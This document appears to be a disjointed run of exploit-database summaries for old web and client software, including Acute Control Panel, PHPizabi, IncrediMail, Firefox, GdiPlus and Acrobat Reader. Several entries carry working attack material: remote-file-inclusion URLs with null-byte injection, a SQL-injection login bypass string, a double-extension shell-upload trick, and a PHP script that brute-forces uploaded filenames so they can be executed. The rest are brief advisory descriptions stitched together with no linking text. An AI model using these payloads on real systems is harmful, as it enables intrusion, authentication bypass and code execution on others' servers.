Acute Control Panel 1.0.0 is vulnerable to Remote File Inclusion and SQL Injection. The vulnerable code is in container.php and header.php (Remote File Inclusion) and in login.php (SQL Injection). The PoC for Remote File Inclusion is http://127.0.0.1/themes/container.php?theme_directory=[Shell]%00 and http://127.0.0.1/themes/header.php?theme_directory=[Shell]%00. The PoC for SQL Injection is Username : admin ' or ' 1=1 and Password : anything or nothing.
Anyone can upload a PHP shell with an extension such as shell.php.jpg. The shell address can be found by right-clicking on the pages to find the shell path.
PHPizabi is prone to a vulnerability that lets remote attackers upload and execute arbitrary script code. The uploaded file is saved into the "/system/cache/temp/" directory and the filename has the form xxx_filename.ext, where xxx is a random number between 1 and 999. If directory listing isn't denied, the attacker does not need to know the actual filename (this PoC works only in this case); otherwise there are various ways to retrieve the filename, e.g. with this script: $chunk = range(1, 999); shuffle($chunk); $packet = "GET {$path}system/cache/temp/%d_filename.ext HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; foreach ($chunk as $num) { $fp = fsockopen($host, 80); fputs($fp, sprintf($packet, $num)); if (strpos(fread($fp, 1024), "200 OK") !== false) { echo "Filename: {$num}_filename.ext\n"; break; } fclose($fp); }
This exploit is a proof-of-concept (PoC) for a remote memory corruption vulnerability in Firefox. It works on both Windows and Linux systems. The exploit is available in the form of a tar.gz file from the GitLab Exploit Database.
Most popular mail clients now exclude script code from mail content. This aims to avoid this type of XSS exploitation (e.g. stolen cookies). IncrediMail also removes script code when the user reads mail. However, I found that the "Reply" and "Forward" functions of the mail client do not handle mail content well, resulting in an XSS vulnerability.
The vulnerability is caused by an input validation error when processing FTP requests. This can be exploited to read, modify, or delete arbitrary files on the affected system via directory traversal attacks. The vulnerability is also caused by an error in handling the RETR command. This can be exploited to crash the FTP service by sending the 'RETR' command without sending the 'PORT' command.
The vulnerable file is view.php, which is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious SQL query to the vulnerable file. This can allow the attacker to read arbitrary files on the server.
A stack overflow vulnerability exists in Microsoft GdiPlus.dll when processing EMF files. An attacker can exploit this vulnerability by enticing a user to open a specially crafted EMF file, resulting in the execution of arbitrary code.
This exploit allows attackers to gain remote access to a vulnerable system by exploiting a vulnerability in Adobe Acrobat Reader. The vulnerability is caused by a boundary error in the handling of JBIG2 streams within PDF documents. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a specially crafted PDF file. Successful exploitation allows execution of arbitrary code.
A SQL injection vulnerability exists in the /theme/default/proc.inc.php file of PHPizabi v0.848b C1 HFP1. An attacker can exploit this vulnerability by crafting a malicious URL and sending it to an authenticated user. This URL contains a malicious SQL query which can be used to change the username and password of an existing user, grant the attacker admin rights, and execute arbitrary code on the vulnerable system.